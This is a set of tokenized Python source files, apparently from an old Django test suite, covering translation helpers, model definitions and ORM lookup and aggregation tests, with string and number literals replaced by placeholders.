return mark_safe ( result ) <EOL> return result <EOL> def ugettext ( message ) : <EOL> return force_unicode ( gettext ( message ) ) <EOL> gettext_noop = gettext_lazy = _ = gettext <EOL> def to_locale ( language ) : <EOL> p = language . find ( '<STR_LIT:->' ) <EOL> if p >= <NUM_LIT:0> : <EOL> return language [ : p ] . lower ( ) + '<STR_LIT:_>' + language [ p + <NUM_LIT:1> : ] . upper ( ) <EOL> else : <EOL> return language . lower ( ) <EOL> def get_language_from_request ( request ) : <EOL> return settings . LANGUAGE_CODE <EOL> def get_date_formats ( ) : <EOL> warnings . warn ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> PendingDeprecationWarning <EOL> ) <EOL> return settings . DATE_FORMAT , settings . DATETIME_FORMAT , settings . TIME_FORMAT <EOL> def get_partial_date_formats ( ) : <EOL> warnings . warn ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> PendingDeprecationWarning <EOL> ) <EOL> return settings . YEAR_MONTH_FORMAT , settings . MONTH_DAY_FORMAT </s>
<s> """<STR_LIT>""" <EOL> from django . db import models , DEFAULT_DB_ALIAS <EOL> class Article ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> , default = '<STR_LIT>' ) <EOL> pub_date = models . DateTimeField ( ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return self . headline </s>
<s> </s>
<s> from django . db import models <EOL> from datetime import datetime <EOL> class Person ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT> ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> class Group ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT> ) <EOL> members = models . ManyToManyField ( Person , through = '<STR_LIT>' ) <EOL> custom_members = models . ManyToManyField ( Person , through = '<STR_LIT>' , related_name = "<STR_LIT>" ) <EOL> nodefaultsnonulls = models . ManyToManyField ( Person , through = '<STR_LIT>' , related_name = "<STR_LIT>" ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> class Membership ( models . Model ) : <EOL> person = models . ForeignKey ( Person ) <EOL> group = models . ForeignKey ( Group ) <EOL> date_joined = models . DateTimeField ( default = datetime . now ) <EOL> invite_reason = models . CharField ( max_length = <NUM_LIT:64> , null = True ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . person . name , self . group . name ) <EOL> class CustomMembership ( models . Model ) : <EOL> person = models . ForeignKey ( Person , db_column = "<STR_LIT>" , related_name = "<STR_LIT>" ) <EOL> group = models . ForeignKey ( Group ) <EOL> weird_fk = models . ForeignKey ( Membership , null = True ) <EOL> date_joined = models . DateTimeField ( default = datetime . now ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . person . name , self . group . name ) <EOL> class Meta : <EOL> db_table = "<STR_LIT>" <EOL> class TestNoDefaultsOrNulls ( models . Model ) : <EOL> person = models . ForeignKey ( Person ) <EOL> group = models . ForeignKey ( Group ) <EOL> nodefaultnonull = models . CharField ( max_length = <NUM_LIT:5> ) <EOL> class PersonSelfRefM2M ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:5> ) <EOL> friends = models . ManyToManyField ( '<STR_LIT>' , through = "<STR_LIT>" , symmetrical = False ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> class Friendship ( models . Model ) : <EOL> first = models . ForeignKey ( PersonSelfRefM2M , related_name = "<STR_LIT>" ) <EOL> second = models . ForeignKey ( PersonSelfRefM2M , related_name = "<STR_LIT>" ) <EOL> date_friended = models . DateTimeField ( ) </s>
<s> from datetime import datetime <EOL> from operator import attrgetter <EOL> from django . db . models import Q <EOL> from django . test import TestCase <EOL> from models import Article <EOL> class OrLookupsTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . a1 = Article . objects . create ( <EOL> headline = '<STR_LIT>' , pub_date = datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT> ) <EOL> ) . pk <EOL> self . a2 = Article . objects . create ( <EOL> headline = '<STR_LIT>' , pub_date = datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT> ) <EOL> ) . pk <EOL> self . a3 = Article . objects . create ( <EOL> headline = '<STR_LIT>' , pub_date = datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT> ) <EOL> ) . pk <EOL> def test_filter_or ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( headline__startswith = '<STR_LIT>' ) | Article . objects . filter ( headline__startswith = '<STR_LIT>' ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( headline__contains = '<STR_LIT>' ) | Article . objects . filter ( headline__contains = '<STR_LIT>' ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( headline__iexact = '<STR_LIT>' ) | Article . objects . filter ( headline__contains = '<STR_LIT>' ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( headline__startswith = '<STR_LIT>' ) | Q ( headline__startswith = '<STR_LIT>' ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> def test_stages ( self ) : <EOL> articles = Article . objects . all ( ) <EOL> self . assertQuerysetEqual ( <EOL> articles . filter ( headline__startswith = '<STR_LIT>' ) & articles . filter ( headline__startswith = '<STR_LIT>' ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> articles . filter ( headline__startswith = '<STR_LIT>' ) & articles . filter ( headline__contains = '<STR_LIT>' ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> def test_pk_q ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( pk = self . a1 ) | Q ( pk = self . a2 ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( pk = self . a1 ) | Q ( pk = self . a2 ) | Q ( pk = self . a3 ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> def test_pk_in ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( pk__in = [ self . a1 , self . a2 , self . a3 ] ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( pk__in = ( self . a1 , self . a2 , self . a3 ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( pk__in = [ self . a1 , self . a2 , self . a3 , <NUM_LIT> ] ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> def test_q_negated ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( pk = self . a1 ) | ~ Q ( pk = self . a2 ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( ~ Q ( pk = self . a1 ) & ~ Q ( pk = self . a2 ) ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( pk = self . a1 ) & ( ~ Q ( pk = self . a2 ) | Q ( pk = self . a3 ) ) ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> def test_complex_filter ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . complex_filter ( { '<STR_LIT>' : self . a1 } ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . complex_filter ( Q ( pk = self . a1 ) | Q ( pk = self . a2 ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> def test_empty_in ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( pk__in = [ ] ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( pk__in = [ ] ) | Q ( headline__icontains = '<STR_LIT>' ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> def test_q_and ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( headline__startswith = '<STR_LIT>' ) , Q ( headline__contains = '<STR_LIT>' ) ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( headline__contains = '<STR_LIT>' ) , headline__startswith = '<STR_LIT>' ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( headline__startswith = '<STR_LIT>' ) & Q ( headline__startswith = '<STR_LIT>' ) ) , <EOL> [ ] <EOL> ) <EOL> def test_q_exclude ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . exclude ( Q ( headline__startswith = '<STR_LIT>' ) ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> def test_other_arg_queries ( self ) : <EOL> self . assertEqual ( <EOL> Article . objects . get ( Q ( headline__startswith = '<STR_LIT>' ) , Q ( headline__contains = '<STR_LIT>' ) ) . headline , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> Article . objects . filter ( Q ( headline__startswith = '<STR_LIT>' ) | Q ( headline__contains = '<STR_LIT>' ) ) . count ( ) , <EOL> <NUM_LIT:3> <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( headline__startswith = '<STR_LIT>' ) , Q ( headline__contains = '<STR_LIT>' ) ) . values ( ) , [ <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:id>" : self . a3 , "<STR_LIT>" : datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT> ) } , <EOL> ] , <EOL> lambda o : o , <EOL> ) <EOL> self . assertEqual ( <EOL> Article . objects . filter ( Q ( headline__startswith = '<STR_LIT>' ) ) . in_bulk ( [ self . a1 , self . a2 ] ) , <EOL> { self . a1 : Article . objects . get ( pk = self . a1 ) } <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> class Article ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> pub_date = models . DateTimeField ( ) <EOL> def __str__ ( self ) : <EOL> return self . headline <EOL> class InternationalArticle ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> pub_date = models . DateTimeField ( ) <EOL> def __unicode__ ( self ) : <EOL> return self . headline </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> class Person ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:200> ) <EOL> class Place ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:200> ) </s>
<s> import datetime <EOL> import pickle <EOL> from decimal import Decimal <EOL> from operator import attrgetter <EOL> from django . conf import settings <EOL> from django . core . exceptions import FieldError <EOL> from django . db import DEFAULT_DB_ALIAS <EOL> from django . db . models import Count , Max , Avg , Sum , StdDev , Variance , F , Q <EOL> from django . test import TestCase , Approximate <EOL> from models import Author , Book , Publisher , Clues , Entries , HardbackBook <EOL> def run_stddev_tests ( ) : <EOL> """<STR_LIT>""" <EOL> if settings . DATABASES [ DEFAULT_DB_ALIAS ] [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> return False <EOL> class StdDevPop ( object ) : <EOL> sql_function = '<STR_LIT>' <EOL> try : <EOL> connection . ops . check_aggregate_support ( StdDevPop ( ) ) <EOL> except : <EOL> return False <EOL> return True <EOL> class AggregationTests ( TestCase ) : <EOL> def assertObjectAttrs ( self , obj , ** kwargs ) : <EOL> for attr , value in kwargs . iteritems ( ) : <EOL> self . assertEqual ( getattr ( obj , attr ) , value ) <EOL> def test_aggregates_in_where_clause ( self ) : <EOL> """<STR_LIT>""" <EOL> qs = Book . objects . values ( '<STR_LIT>' ) . annotate ( Max ( '<STR_LIT:id>' ) ) <EOL> qs = qs . order_by ( '<STR_LIT>' ) . values_list ( '<STR_LIT>' , flat = True ) <EOL> books = Book . objects . order_by ( '<STR_LIT:id>' ) <EOL> qs1 = books . filter ( id__in = qs ) <EOL> qs2 = books . filter ( id__in = list ( qs ) ) <EOL> self . assertEqual ( list ( qs1 ) , list ( qs2 ) ) <EOL> def test_aggregates_in_where_clause_pre_eval ( self ) : <EOL> """<STR_LIT>""" <EOL> qs = Book . objects . values ( '<STR_LIT>' ) . annotate ( Max ( '<STR_LIT:id>' ) ) <EOL> qs = qs . order_by ( '<STR_LIT>' ) . values_list ( '<STR_LIT>' , flat = True ) <EOL> list ( qs ) <EOL> books = Book . objects . order_by ( '<STR_LIT:id>' ) <EOL> qs1 = books . filter ( id__in = qs ) <EOL> qs2 = books . filter ( id__in = list ( qs ) ) <EOL> self . assertEqual ( list ( qs1 ) , list ( qs2 ) ) <EOL> if settings . DATABASES [ DEFAULT_DB_ALIAS ] [ '<STR_LIT>' ] != '<STR_LIT>' : <EOL> def test_annotate_with_extra ( self ) : <EOL> """<STR_LIT>""" <EOL> shortest_book_sql = """<STR_LIT>""" <EOL> qs = Publisher . objects . extra ( select = { <EOL> '<STR_LIT>' : shortest_book_sql , <EOL> } ) . annotate ( total_books = Count ( '<STR_LIT>' ) ) <EOL> list ( qs ) <EOL> def test_aggregate ( self ) : <EOL> self . assertEqual ( <EOL> Author . objects . order_by ( "<STR_LIT:name>" ) . aggregate ( Avg ( "<STR_LIT>" ) ) , <EOL> { "<STR_LIT>" : Approximate ( <NUM_LIT> , places = <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Sum ( "<STR_LIT>" ) ) , <EOL> { "<STR_LIT>" : <NUM_LIT> } , <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Sum ( '<STR_LIT>' ) , Avg ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : Approximate ( <NUM_LIT> , places = <NUM_LIT:2> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . values ( ) . aggregate ( Sum ( '<STR_LIT>' ) , Avg ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : Approximate ( <NUM_LIT> , places = <NUM_LIT:2> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . aggregate ( Sum ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : <NUM_LIT> } <EOL> ) <EOL> def test_annotation ( self ) : <EOL> obj = Book . objects . annotate ( mean_auth_age = Avg ( "<STR_LIT>" ) ) . extra ( select = { "<STR_LIT>" : "<STR_LIT>" } ) . get ( pk = <NUM_LIT:2> ) <EOL> self . assertObjectAttrs ( obj , <EOL> contact_id = <NUM_LIT:3> , <EOL> id = <NUM_LIT:2> , <EOL> isbn = u'<STR_LIT>' , <EOL> mean_auth_age = <NUM_LIT> , <EOL> name = '<STR_LIT>' , <EOL> pages = <NUM_LIT> , <EOL> price = Decimal ( "<STR_LIT>" ) , <EOL> pubdate = datetime . date ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:3> ) , <EOL> publisher_id = <NUM_LIT:2> , <EOL> rating = <NUM_LIT> <EOL> ) <EOL> self . assertTrue ( obj . manufacture_cost == <NUM_LIT> or obj . manufacture_cost == Decimal ( '<STR_LIT>' ) ) <EOL> obj = Book . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . get ( pk = <NUM_LIT:2> ) <EOL> self . assertObjectAttrs ( obj , <EOL> contact_id = <NUM_LIT:3> , <EOL> id = <NUM_LIT:2> , <EOL> isbn = u'<STR_LIT>' , <EOL> mean_auth_age = <NUM_LIT> , <EOL> name = u'<STR_LIT>' , <EOL> pages = <NUM_LIT> , <EOL> price = Decimal ( "<STR_LIT>" ) , <EOL> pubdate = datetime . date ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:3> ) , <EOL> publisher_id = <NUM_LIT:2> , <EOL> rating = <NUM_LIT> <EOL> ) <EOL> self . assertTrue ( obj . manufacture_cost == <NUM_LIT> or obj . manufacture_cost == Decimal ( '<STR_LIT>' ) ) <EOL> obj = Book . objects . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . values ( ) . get ( pk = <NUM_LIT:2> ) <EOL> manufacture_cost = obj [ '<STR_LIT>' ] <EOL> self . assertTrue ( manufacture_cost == <NUM_LIT> or manufacture_cost == Decimal ( '<STR_LIT>' ) ) <EOL> del obj [ '<STR_LIT>' ] <EOL> self . assertEqual ( obj , { <EOL> "<STR_LIT>" : <NUM_LIT:3> , <EOL> "<STR_LIT:id>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : u"<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:name>" : u"<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : Decimal ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : datetime . date ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:3> ) , <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> } ) <EOL> obj = Book . objects . values ( ) . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . get ( pk = <NUM_LIT:2> ) <EOL> manufacture_cost = obj [ '<STR_LIT>' ] <EOL> self . assertTrue ( manufacture_cost == <NUM_LIT> or manufacture_cost == Decimal ( '<STR_LIT>' ) ) <EOL> del obj [ '<STR_LIT>' ] <EOL> self . assertEqual ( obj , { <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:name>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT> <EOL> } ) <EOL> obj = Book . objects . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . values ( '<STR_LIT:name>' ) . get ( pk = <NUM_LIT:1> ) <EOL> self . assertEqual ( obj , { <EOL> "<STR_LIT:name>" : u'<STR_LIT>' , <EOL> } ) <EOL> obj = Book . objects . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . values ( '<STR_LIT:name>' , '<STR_LIT>' ) . get ( pk = <NUM_LIT:1> ) <EOL> self . assertEqual ( obj , { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:name>' : u'<STR_LIT>' , <EOL> } ) <EOL> qs = Book . objects . annotate ( n_authors = Count ( '<STR_LIT>' ) ) . values ( '<STR_LIT:name>' ) . filter ( n_authors__gt = <NUM_LIT:2> ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { "<STR_LIT:name>" : u'<STR_LIT>' } <EOL> ] , <EOL> lambda b : b , <EOL> ) <EOL> obj = Book . objects . values ( '<STR_LIT:name>' ) . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . get ( pk = <NUM_LIT:1> ) <EOL> self . assertEqual ( obj , { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:name>' : u'<STR_LIT>' , <EOL> } ) <EOL> self . assertEqual ( <EOL> len ( Author . objects . annotate ( Avg ( '<STR_LIT>' ) ) . values ( ) ) , <EOL> <NUM_LIT:9> <EOL> ) <EOL> qs = Book . objects . values ( '<STR_LIT>' ) . annotate ( oldest = Max ( '<STR_LIT>' ) ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) . annotate ( Max ( '<STR_LIT>' ) ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , <EOL> { '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:7> } , <EOL> { '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:9> } , <EOL> { '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:7> } <EOL> ] , <EOL> lambda b : b , <EOL> ) <EOL> def test_aggrate_annotation ( self ) : <EOL> vals = Book . objects . all ( ) . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . aggregate ( Max ( '<STR_LIT>' ) , Max ( '<STR_LIT>' ) , Sum ( '<STR_LIT>' ) , Avg ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( vals , { <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : Approximate ( <NUM_LIT> , places = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : Decimal ( "<STR_LIT>" ) <EOL> } ) <EOL> def test_field_error ( self ) : <EOL> self . assertRaises ( <EOL> FieldError , <EOL> lambda : Book . objects . all ( ) . aggregate ( num_authors = Count ( '<STR_LIT:foo>' ) ) <EOL> ) <EOL> self . assertRaises ( <EOL> FieldError , <EOL> lambda : Book . objects . all ( ) . annotate ( num_authors = Count ( '<STR_LIT:foo>' ) ) <EOL> ) <EOL> self . assertRaises ( <EOL> FieldError , <EOL> lambda : Book . objects . all ( ) . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . aggregate ( Max ( '<STR_LIT:foo>' ) ) <EOL> ) <EOL> def test_more ( self ) : <EOL> self . assertEqual ( <EOL> Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . count ( ) , <EOL> <NUM_LIT:6> <EOL> ) <EOL> vals = Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . aggregate ( Max ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> vals , <EOL> { '<STR_LIT>' : <NUM_LIT:3> } <EOL> ) <EOL> vals = Publisher . objects . annotate ( avg_price = Avg ( '<STR_LIT>' ) ) . aggregate ( Max ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> vals , <EOL> { '<STR_LIT>' : <NUM_LIT> } <EOL> ) <EOL> vals = Book . objects . aggregate ( number = Max ( '<STR_LIT>' ) , select = Max ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> vals , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } <EOL> ) <EOL> obj = Book . objects . select_related ( '<STR_LIT>' ) . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . values ( ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( obj , { <EOL> '<STR_LIT>' : <NUM_LIT:8> , <EOL> '<STR_LIT:id>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT:name>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : Decimal ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:15> ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } ) <EOL> self . assertEqual ( <EOL> len ( Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) ) , <EOL> <NUM_LIT:6> <EOL> ) <EOL> self . assertEqual ( <EOL> len ( Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . filter ( num_authors__gt = <NUM_LIT:2> ) ) , <EOL> <NUM_LIT:1> <EOL> ) <EOL> self . assertEqual ( <EOL> len ( Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . exclude ( num_authors__gt = <NUM_LIT:2> ) ) , <EOL> <NUM_LIT:5> <EOL> ) <EOL> self . assertEqual ( <EOL> len ( Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . filter ( num_authors__lt = <NUM_LIT:3> ) . exclude ( num_authors__lt = <NUM_LIT:2> ) ) , <EOL> <NUM_LIT:2> <EOL> ) <EOL> self . assertEqual ( <EOL> len ( Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . exclude ( num_authors__lt = <NUM_LIT:2> ) . filter ( num_authors__lt = <NUM_LIT:3> ) ) , <EOL> <NUM_LIT:2> <EOL> ) <EOL> def test_aggregate_fexpr ( self ) : <EOL> qs = Publisher . objects . annotate ( num_books = Count ( '<STR_LIT>' ) ) . filter ( num_books__lt = F ( '<STR_LIT>' ) / <NUM_LIT:2> ) . order_by ( '<STR_LIT:name>' ) . values ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:9> } , <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:7> } <EOL> ] , <EOL> lambda p : p , <EOL> ) <EOL> qs = Publisher . objects . annotate ( num_books = Count ( '<STR_LIT>' ) ) . exclude ( num_books__lt = F ( '<STR_LIT>' ) / <NUM_LIT:2> ) . order_by ( '<STR_LIT:name>' ) . values ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:3> } , <EOL> { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT:name>' : u"<STR_LIT>" , '<STR_LIT>' : <NUM_LIT:0> } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> } <EOL> ] , <EOL> lambda p : p , <EOL> ) <EOL> qs = Publisher . objects . annotate ( num_books = Count ( '<STR_LIT>' ) ) . filter ( num_awards__gt = <NUM_LIT:2> * F ( '<STR_LIT>' ) ) . order_by ( '<STR_LIT:name>' ) . values ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:9> } , <EOL> { '<STR_LIT>' : <NUM_LIT:2> , 